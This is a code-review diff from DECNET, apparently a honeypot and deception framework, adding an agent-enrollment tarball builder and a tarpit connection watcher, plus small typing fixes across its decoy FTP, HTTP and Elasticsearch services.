label="Container hostname",
type="string",
placeholder="e.g. mail-01.corp.local",
help=(
"Cosmetic override for the telnet banner — keeps decoys "
"looking heterogeneous. Decky identity (NODE_NAME) is unaffected."
),
),
]
def compose_fragment(
self,
decky_name: str,

View File

@@ -8,6 +8,7 @@ class TFTPService(BaseService):
name = "tftp"
ports = [69]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -8,6 +8,7 @@ class VNCService(BaseService):
name = "vnc"
ports = [5900]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -0,0 +1,209 @@
"""Tarball + bootstrap construction for agent-enrollment bundles.
Pure I/O, no FastAPI dependency — independently testable.
"""
from __future__ import annotations
import io
import os
import pathlib
import tarfile
from datetime import datetime, timezone
from typing import Optional
from decnet.swarm import pki
# ---------------------------------------------------------------------------
# Include / exclude manifest
# ---------------------------------------------------------------------------
# Explicit include list — fails closed. Stray files on the master
# (dev venvs, .env files, editor scratch) cannot leak into the bundle.
_INCLUDED_ROOT_FILES: tuple[str, ...] = ("pyproject.toml",)
_INCLUDED_DIRS: tuple[str, ...] = ("decnet",)
# Subtrees of _INCLUDED_DIRS that must NOT ship (relative to repo root).
# * decnet/web — FastAPI master app, unused on agents.
# * decnet/mutator — swarm-wide respawn scheduler, master-only.
# * decnet/profiler — rebuilds profiles against master DB, master-only.
_EXCLUDED_DECNET_SUBTREES: frozenset[str] = frozenset({
"decnet/web",
"decnet/mutator",
"decnet/profiler",
})
# Agent-side systemd units. Profiler stays master-side intentionally.
_SYSTEMD_UNITS = (
"decnet-agent", "decnet-forwarder", "decnet-engine", "decnet-updater",
"decnet-collector", "decnet-prober", "decnet-sniffer",
)
# ---------------------------------------------------------------------------
# Path helpers
# ---------------------------------------------------------------------------
def _repo_root() -> pathlib.Path:
    """Return the third ancestor of this file's resolved path (the repo root)."""
    module_path = pathlib.Path(__file__).resolve()
    # decnet/swarm/bundle_builder.py -> parents[2] = repo root.
    return module_path.parents[2]
def _templates_dir() -> pathlib.Path:
    """Return ``web/templates`` under the directory two levels up from this file."""
    package_dir = pathlib.Path(__file__).resolve().parents[1]
    return package_dir / "web" / "templates"
# ---------------------------------------------------------------------------
# Filesystem walk
# ---------------------------------------------------------------------------
def _iter_included(root: pathlib.Path) -> list[tuple[pathlib.Path, str]]:
    """Collect ``(full_path, arcname)`` pairs for every file the agent needs.

    Root-level files come from ``_INCLUDED_ROOT_FILES`` (only those that
    exist); directory trees come from ``_INCLUDED_DIRS``. During the walk,
    ``__pycache__`` directories and the subtrees listed in
    ``_EXCLUDED_DECNET_SUBTREES`` are pruned before descent, and compiled
    ``.pyc``/``.pyo`` files and symlinked files are left out. The result is
    sorted by arcname.
    """
    collected: list[tuple[pathlib.Path, str]] = [
        (root / name, name)
        for name in _INCLUDED_ROOT_FILES
        if (root / name).is_file()
    ]

    for top_level in _INCLUDED_DIRS:
        base = root / top_level
        if not base.is_dir():
            continue
        for current, subdirs, files in os.walk(base, topdown=True, followlinks=False):
            current_path = pathlib.Path(current)
            rel = current_path.relative_to(root).as_posix()

            # Slice-assign so os.walk sees the pruned list and never
            # descends into the removed directories.
            kept: list[str] = []
            for sub in subdirs:
                if sub == "__pycache__":
                    continue
                if f"{rel}/{sub}" in _EXCLUDED_DECNET_SUBTREES:
                    continue
                kept.append(sub)
            subdirs[:] = kept

            for filename in files:
                candidate = current_path / filename
                if filename.endswith((".pyc", ".pyo")) or candidate.is_symlink():
                    continue
                collected.append((candidate, f"{rel}/{filename}"))

    collected.sort(key=lambda pair: pair[1])
    return collected
# ---------------------------------------------------------------------------
# Content renderers
# ---------------------------------------------------------------------------
def _render_decnet_ini(
    master_host: str,
    host_uuid: str,
    use_ipvlan: bool = False,
    swarmctl_port: int = 8770,
) -> bytes:
    """Render the agent's ``decnet.ini`` and return it as encoded bytes.

    The ``[decnet]`` section fixes agent mode and the log directory and
    records the ipvlan flag; the ``[agent]`` section carries the master
    host, swarmctl port, host UUID and fixed port/directory settings.
    """
    ipvlan_value = "true" if use_ipvlan else "false"
    pieces = (
        "; Generated by DECNET agent-enrollment bundle.\n",
        "[decnet]\n",
        "mode = agent\n",
        "disallow-master = true\n",
        "log-directory = /var/log/decnet\n",
        f"ipvlan = {ipvlan_value}\n",
        "\n",
        "[agent]\n",
        f"master-host = {master_host}\n",
        f"swarmctl-port = {swarmctl_port}\n",
        "swarm-syslog-port = 6514\n",
        "agent-port = 8765\n",
        "agent-dir = /etc/decnet/agent\n",
        "updater-dir = /etc/decnet/updater\n",
        f"host-uuid = {host_uuid}\n",
    )
    return "".join(pieces).encode()
def _add_bytes(tar: tarfile.TarFile, name: str, data: bytes, mode: int = 0o644) -> None:
    """Write *data* into *tar* as a member called *name*.

    The member gets permission bits *mode* and a modification time equal
    to the current UTC time, truncated to whole seconds.
    """
    member = tarfile.TarInfo(name)
    member.size, member.mode = len(data), mode
    member.mtime = int(datetime.now(timezone.utc).timestamp())
    payload = io.BytesIO(data)
    tar.addfile(member, payload)
def _render_systemd_unit(name: str, agent_name: str, master_host: str) -> bytes:
    """Render the ``{name}.service.j2`` template and return it as UTF-8 bytes.

    Rendering is a literal string replacement of the ``{{ agent_name }}``
    and ``{{ master_host }}`` placeholders; no template engine is involved,
    so any other template syntax in the file is passed through unchanged.

    Raises:
        OSError: the template file cannot be read.
    """
    tpl_path = _templates_dir() / f"{name}.service.j2"
    # Read explicitly as UTF-8 so the result does not depend on the
    # process locale; the output below is encoded as UTF-8 as well.
    tpl = tpl_path.read_text(encoding="utf-8")
    return (
        tpl.replace("{{ agent_name }}", agent_name)
        .replace("{{ master_host }}", master_host)
    ).encode("utf-8")
def render_bootstrap(
    agent_name: str,
    master_host: str,
    tarball_url: str,
    expires_at: datetime,
    with_updater: bool,
) -> bytes:
    """Render ``enroll_bootstrap.sh.j2`` and return the script as UTF-8 bytes.

    Placeholders are filled by literal string replacement (no template
    engine): ``agent_name``, ``master_host``, ``tarball_url``,
    ``generated_at`` (current UTC time), ``expires_at`` (both timestamps
    in ISO-8601 with microseconds dropped) and ``with_updater`` (rendered
    as ``true``/``false``).

    Raises:
        OSError: the template file cannot be read.
    """
    # NOTE(review): values are inserted verbatim with no quoting or
    # escaping; presumably callers validate them before they reach a shell
    # script — confirm against the template and the enrollment endpoint.
    tpl_path = _templates_dir() / "enroll_bootstrap.sh.j2"
    # Read explicitly as UTF-8 so rendering does not depend on the locale.
    tpl = tpl_path.read_text(encoding="utf-8")
    now = datetime.now(timezone.utc).replace(microsecond=0).isoformat()
    rendered = (
        tpl.replace("{{ agent_name }}", agent_name)
        .replace("{{ master_host }}", master_host)
        .replace("{{ tarball_url }}", tarball_url)
        .replace("{{ generated_at }}", now)
        .replace("{{ expires_at }}", expires_at.replace(microsecond=0).isoformat())
        .replace("{{ with_updater }}", "true" if with_updater else "false")
    )
    return rendered.encode("utf-8")
# ---------------------------------------------------------------------------
# Public API
# ---------------------------------------------------------------------------
def build_tarball(
    master_host: str,
    agent_name: str,
    host_uuid: str,
    issued: pki.IssuedCert,
    services_ini: Optional[str],
    updater_issued: Optional[pki.IssuedCert] = None,
    use_ipvlan: bool = False,
) -> bytes:
    """Assemble the gzipped enrollment tarball for one agent and return its bytes.

    Members are written in this order: the source files selected by
    ``_iter_included``, the generated ``decnet.ini``, one systemd unit per
    entry in ``_SYSTEMD_UNITS``, the agent CA/cert/key, the updater
    CA/cert/key when *updater_issued* is given, and ``services.ini`` when
    *services_ini* is non-empty. Private keys are stored with mode 0o600.
    """
    root = _repo_root()
    archive = io.BytesIO()

    with tarfile.open(fileobj=archive, mode="w:gz") as tar:
        for source_path, member_name in _iter_included(root):
            tar.add(source_path, arcname=member_name, recursive=False)

        ini_bytes = _render_decnet_ini(master_host, host_uuid, use_ipvlan)
        _add_bytes(tar, "etc/decnet/decnet.ini", ini_bytes)

        for unit_name in _SYSTEMD_UNITS:
            unit_bytes = _render_systemd_unit(unit_name, agent_name, master_host)
            _add_bytes(tar, f"etc/systemd/system/{unit_name}.service", unit_bytes)

        # (arcname, payload, mode) for the credential and optional extras
        extras: list[tuple[str, bytes, int]] = [
            ("home/.decnet/agent/ca.crt", issued.ca_cert_pem, 0o644),
            ("home/.decnet/agent/worker.crt", issued.cert_pem, 0o644),
            ("home/.decnet/agent/worker.key", issued.key_pem, 0o600),
        ]
        if updater_issued is not None:
            extras += [
                ("home/.decnet/updater/ca.crt", updater_issued.ca_cert_pem, 0o644),
                ("home/.decnet/updater/updater.crt", updater_issued.cert_pem, 0o644),
                ("home/.decnet/updater/updater.key", updater_issued.key_pem, 0o600),
            ]
        if services_ini:
            extras.append(("services.ini", services_ini.encode(), 0o644))

        for member_name, payload, member_mode in extras:
            _add_bytes(tar, member_name, payload, mode=member_mode)

    return archive.getvalue()

View File

@@ -0,0 +1,3 @@
from .worker import tarpit_watcher_worker
__all__ = ["tarpit_watcher_worker"]

208
decnet/tarpit/worker.py Normal file
View File

@@ -0,0 +1,208 @@
"""Tarpit connection watcher — edge-triggered enter/exit log events.
Polls active tarpit rules every ``DECNET_TARPIT_POLL_INTERVAL`` seconds
(default 15). For each rule, reads ``/proc/{pid}/net/tcp`` on the host
(no docker exec, no ss needed inside the container) to find ESTABLISHED
connections on the tarpitted ports. Emits structured log events:
* ``tarpit_enter`` — new connection seen on a tarpitted port
* ``tarpit_exit`` — connection gone; includes elapsed time in seconds
Runs embedded in the API process (always-on, near-zero cost when no
rules exist).
"""
from __future__ import annotations
import asyncio
import json
import socket
from datetime import datetime, timezone
from typing import Any, Optional
from decnet.decky_io.resolve import resolve_decky_container
from decnet.logging import get_logger
from decnet.network import get_container_pid
from decnet.web.db.repository import BaseRepository
log = get_logger("tarpit.watcher")
_POLL_INTERVAL_ENV = "DECNET_TARPIT_POLL_INTERVAL"
_DEFAULT_POLL_S = 15
_TCP_ESTABLISHED = "01"
def _read_proc_net_tcp(pid: int) -> str:
    """Return the contents of /proc/{pid}/net/tcp, or "" if it cannot be read."""
    proc_file = f"/proc/{pid}/net/tcp"
    try:
        with open(proc_file) as handle:
            contents = handle.read()
    except OSError:
        # Missing or unreadable file is treated as "no connections".
        contents = ""
    return contents
def _parse_connections(content: str, target_port: int) -> list[str]:
    """Return list of remote IPs in ESTABLISHED state on target_port.

    *content* is the text of a ``/proc/<pid>/net/tcp`` table. The first
    line is treated as the column header and skipped. Rows that are too
    short, not ESTABLISHED, bound to another local port, or whose address
    fields cannot be parsed are ignored rather than raising, so one bad
    row cannot abort the caller. The same IP appears once per matching
    connection. ``0.0.0.0`` is never returned.
    """
    ips: list[str] = []
    for line in content.strip().splitlines()[1:]:
        parts = line.split()
        if len(parts) < 4:
            continue
        local_hex, rem_hex, state = parts[1], parts[2], parts[3]
        if state != _TCP_ESTABLISHED:
            continue
        # Local field is "HEXIP:HEXPORT"; skip the row if it is not.
        try:
            local_port = int(local_hex.split(":")[1], 16)
        except (IndexError, ValueError):
            continue
        if local_port != target_port:
            continue
        rem_ip_hex = rem_hex.split(":")[0]
        try:
            # The hex bytes are reversed before decoding as dotted-quad.
            # NOTE(review): this matches little-endian hosts; confirm if
            # big-endian targets ever matter.
            ip_bytes = bytes.fromhex(rem_ip_hex)[::-1]
            ip = socket.inet_ntoa(ip_bytes)
        except (ValueError, OSError):
            continue
        if ip != "0.0.0.0":  # nosec B104
            ips.append(ip)
    return ips
def _get_poll_interval() -> int:
    """Return the poll interval in seconds from the environment.

    Reads the variable named by ``_POLL_INTERVAL_ENV``; when it is unset
    or not parseable as an integer, ``_DEFAULT_POLL_S`` is returned.
    """
    import os

    configured = os.environ.get(_POLL_INTERVAL_ENV, _DEFAULT_POLL_S)
    try:
        interval = int(configured)
    except (TypeError, ValueError):
        interval = _DEFAULT_POLL_S
    return interval
async def _get_attacker_uuid(repo: BaseRepository, ip: str) -> Optional[str]:
    """Look up the ``uuid`` of the Attacker row whose ``ip`` equals *ip*.

    Best-effort: returns ``None`` when no row matches and also when the
    lookup fails for any reason (import error, database error, more than
    one matching row). Failures are logged at debug level instead of being
    dropped silently, so they can be diagnosed without affecting callers.
    """
    try:
        # Imported lazily inside the try so an import failure is handled
        # like any other lookup failure.
        from decnet.web.db.models import Attacker
        from sqlalchemy import select

        async with repo._session() as session:  # type: ignore[attr-defined]
            result = await session.execute(
                select(Attacker).where(Attacker.ip == ip)  # type: ignore[arg-type]
            )
            row = result.scalar_one_or_none()
            return row.uuid if row else None
    except Exception as exc:
        log.debug("tarpit attacker lookup failed ip=%s: %s", ip, exc)
        return None
async def _emit_log(
    repo: BaseRepository,
    *,
    event_type: str,
    decky_name: str,
    src_ip: str,
    port: int,
    extra: dict[str, Any] | None = None,
) -> None:
    """Store one tarpit event through ``repo.add_log``.

    The record's ``fields`` JSON always holds ``port`` and the attacker
    UUID resolved for *src_ip*; entries from *extra* are merged on top.
    Any failure while building or storing the record is logged as a
    warning and not re-raised.
    """
    resolved_uuid = await _get_attacker_uuid(repo, src_ip)
    payload: dict[str, Any] = {
        "port": port,
        "attacker_uuid": resolved_uuid,
        **(extra or {}),
    }
    try:
        record = {
            "decky": decky_name,
            "service": "tarpit",
            "event_type": event_type,
            "attacker_ip": src_ip,
            "raw_line": f"tarpit {event_type} src={src_ip} decky={decky_name} port={port}",
            "fields": json.dumps(payload),
        }
        await repo.add_log(record)
    except Exception as exc:
        log.warning("tarpit log emit failed: %s", exc)
async def tarpit_watcher_worker(repo: BaseRepository) -> None:
    """Run the tarpit watcher loop until the task is cancelled.

    Each iteration runs one ``_tick`` and then sleeps for the poll interval
    read once at startup. Cancellation propagates; any other exception
    from a tick is logged as a warning and the loop carries on.
    """
    interval = _get_poll_interval()
    log.info("tarpit watcher started poll_interval=%ds", interval)

    # (decky_name, src_ip, port) → first_seen timestamp
    active: dict[tuple[str, str, int], datetime] = {}

    while True:
        try:
            await _tick(repo, active)
        except asyncio.CancelledError:
            raise
        except Exception as exc:
            log.warning("tarpit watcher tick error: %s", exc)
        await asyncio.sleep(interval)
async def _tick(
    repo: BaseRepository,
    seen: dict[tuple[str, str, int], datetime],
) -> None:
    """Run one polling pass and emit enter/exit events for changes.

    For every tarpit rule the decky's container PID is resolved, its TCP
    table is read, and each ESTABLISHED peer on a tarpitted port is
    recorded. Connections not yet in *seen* produce a ``tarpit_enter``
    event; entries in *seen* that are no longer observed produce a
    ``tarpit_exit`` event carrying the elapsed seconds. *seen* is mutated
    in place and carries state between calls.

    Rules whose decky cannot be resolved (lookup failure or malformed
    topology key) are skipped for this pass; their previously seen
    connections are therefore reported as exited.
    """
    rules = await repo.list_tarpit_rules()
    if not rules:
        # No active tarpit rules — clear stale seen state and bail early.
        # No exit events are emitted for the cleared entries.
        seen.clear()
        return

    current: set[tuple[str, str, int]] = set()

    for rule in rules:
        db_key: str = rule["decky_name"]
        ports: list[int] = rule["ports"]

        # Topology deckies are stored as "t:{topology_id}:{decky_name}".
        # Resolve the real container name before asking Docker for its PID.
        if db_key.startswith("t:"):
            key_parts = db_key.split(":", 2)
            if len(key_parts) != 3:
                # A malformed key must not abort the pass for every other
                # rule; skip it like any other unresolved decky.
                log.debug("tarpit watcher: malformed topology decky key %r", db_key)
                continue
            _, topology_id, decky_name = key_parts
            try:
                container = await resolve_decky_container(
                    repo, decky_name, topology_id=topology_id,
                )
            except LookupError as exc:
                log.debug("tarpit watcher: %s", exc)
                continue
        else:
            decky_name = db_key
            container = db_key

        try:
            pid = await asyncio.to_thread(get_container_pid, container)
        except LookupError as exc:
            log.debug("tarpit watcher: %s", exc)
            continue

        tcp_content = await asyncio.to_thread(_read_proc_net_tcp, pid)

        for port in ports:
            for src_ip in _parse_connections(tcp_content, port):
                # NOTE(review): the key uses the bare decky_name, so a
                # topology decky and a fleet decky with the same name
                # would share state — confirm names are unique.
                key = (decky_name, src_ip, port)
                current.add(key)
                if key not in seen:
                    seen[key] = datetime.now(timezone.utc)
                    log.info(
                        "tarpit enter decky=%s src=%s port=%d",
                        decky_name, src_ip, port,
                    )
                    await _emit_log(
                        repo,
                        event_type="tarpit_enter",
                        decky_name=decky_name,
                        src_ip=src_ip,
                        port=port,
                    )

    # Iterate over a snapshot because entries are removed during the loop.
    for key in list(seen):
        if key not in current:
            first_seen = seen.pop(key)
            elapsed = int((datetime.now(timezone.utc) - first_seen).total_seconds())
            decky_name, src_ip, port = key
            log.info(
                "tarpit exit decky=%s src=%s port=%d elapsed=%ds",
                decky_name, src_ip, port, elapsed,
            )
            await _emit_log(
                repo,
                event_type="tarpit_exit",
                decky_name=decky_name,
                src_ip=src_ip,
                port=port,
                extra={"duration_s": elapsed},
            )

View File

@@ -138,7 +138,7 @@ def traced(fn: F) -> F: ...
def traced(name: str) -> Callable[[F], F]: ...
def traced(fn: Any = None, *, name: str | None = None) -> Any:
def traced(fn: Any = None, *, name: str | None = None) -> Any: # type: ignore[misc]
"""Decorator that wraps a function in an OTEL span.
Usage::
@@ -168,9 +168,9 @@ def traced(fn: Any = None, *, name: str | None = None) -> Any:
# Called as @traced (no arguments)
return _wrap(fn, None)
# Fallback: @traced() with no args
def decorator(f: F) -> F:
def _fallback_decorator(f: F) -> F:
return _wrap(f, name)
return decorator
return _fallback_decorator
def _wrap(fn: F, span_name: str | None) -> F:

View File

@@ -120,7 +120,7 @@ def parse_type3(blob: bytes) -> Optional[dict]:
if domain:
principal = f"{domain}\\{username}"
else:
principal = username or None
principal = username
return {
"username": username,

View File

@@ -128,6 +128,9 @@ def main():
signal.signal(signal.SIGINT, _forward)
try:
if proc.stdout is None:
proc.wait()
return
for raw_line in proc.stdout:
line = raw_line.rstrip()
if not line:

View File

@@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555.
"""
import base64
import binascii
import re
from datetime import datetime, timezone
from typing import Any, Optional
@@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An
if scheme == "basic":
try:
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
except (ValueError, base64.binascii.Error):
except (ValueError, binascii.Error):
return None
if ":" not in decoded:
return None

View File

@@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555.
"""
import base64
import binascii
import re
from datetime import datetime, timezone
from typing import Any, Optional
@@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An
if scheme == "basic":
try:
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
except (ValueError, base64.binascii.Error):
except (ValueError, binascii.Error):
return None
if ":" not in decoded:
return None

View File

@@ -94,7 +94,7 @@ class ESHandler(BaseHTTPRequestHandler):
server_version = "elasticsearch"
sys_version = ""
def _send_json(self, code: int, data: dict) -> None:
def _send_json(self, code: int, data: dict | list) -> None:
body = json.dumps(data).encode()
self.send_response(code)
self.send_header("Content-Type", "application/json; charset=UTF-8")

View File

@@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555.
"""
import base64
import binascii
import re
from datetime import datetime, timezone
from typing import Any, Optional
@@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An
if scheme == "basic":
try:
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
except (ValueError, base64.binascii.Error):
except (ValueError, binascii.Error):
return None
if ":" not in decoded:
return None

View File

@@ -7,9 +7,12 @@ forwards events as JSON to LOG_TARGET if set.
import os
from pathlib import Path
from typing import cast
from twisted.internet import defer, reactor
from twisted.internet.interfaces import IReactorTCP
from twisted.protocols.ftp import FTP, FTPFactory, FTPAnonymousShell
from twisted.python.failure import Failure
from twisted.python.filepath import FilePath
from twisted.python import log as twisted_log
@@ -95,7 +98,8 @@ _BAIT_PATH = _setup_bait_fs()
class ServerFTP(FTP):
def connectionMade(self):
peer = self.transport.getPeer()
assert self.transport is not None
peer = self.transport.getPeer() # type: ignore[misc]
_log("connection", src_ip=peer.host, src_port=peer.port)
super().connectionMade()
@@ -120,15 +124,16 @@ class ServerFTP(FTP):
return defer.succeed((530, "Login incorrect."))
self.state = self.AUTHED
self._user = getattr(self, "_server_user", "anonymous")
self.shell = FTPAnonymousShell(FilePath(_BAIT_PATH))
self.shell = FTPAnonymousShell(FilePath(_BAIT_PATH)) # type: ignore[assignment]
return defer.succeed((230, "Login successful."))
def ftp_RETR(self, path):
_log("download_attempt", path=path)
return super().ftp_RETR(path)
def connectionLost(self, reason):
peer = self.transport.getPeer()
def connectionLost(self, reason: Failure) -> None: # type: ignore[override]
assert self.transport is not None
peer = self.transport.getPeer() # type: ignore[misc]
_log("disconnect", src_ip=peer.host, src_port=peer.port)
super().connectionLost(reason)
@@ -140,5 +145,5 @@ class ServerFTPFactory(FTPFactory):
if __name__ == "__main__":
twisted_log.startLoggingWithObserver(lambda e: None, setStdout=False)
_log("startup", msg=f"FTP server starting as {NODE_NAME} on port {PORT}")
reactor.listenTCP(PORT, ServerFTPFactory())
reactor.run()
cast(IReactorTCP, reactor).listenTCP(PORT, ServerFTPFactory()) # type: ignore[arg-type]
reactor.run() # type: ignore[attr-defined]

View File

@@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555.
"""
import base64
import binascii
import re
from datetime import datetime, timezone
from typing import Any, Optional
@@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An
if scheme == "basic":
try:
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
except (ValueError, base64.binascii.Error):
except (ValueError, binascii.Error):
return None
if ":" not in decoded:
return None

View File

@@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555.
"""
import base64
import binascii
import re
from datetime import datetime, timezone
from typing import Any, Optional
@@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An
if scheme == "basic":
try:
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
except (ValueError, base64.binascii.Error):
except (ValueError, binascii.Error):
return None
if ":" not in decoded:
return None

Some files were not shown because too many files have changed in this diff Show More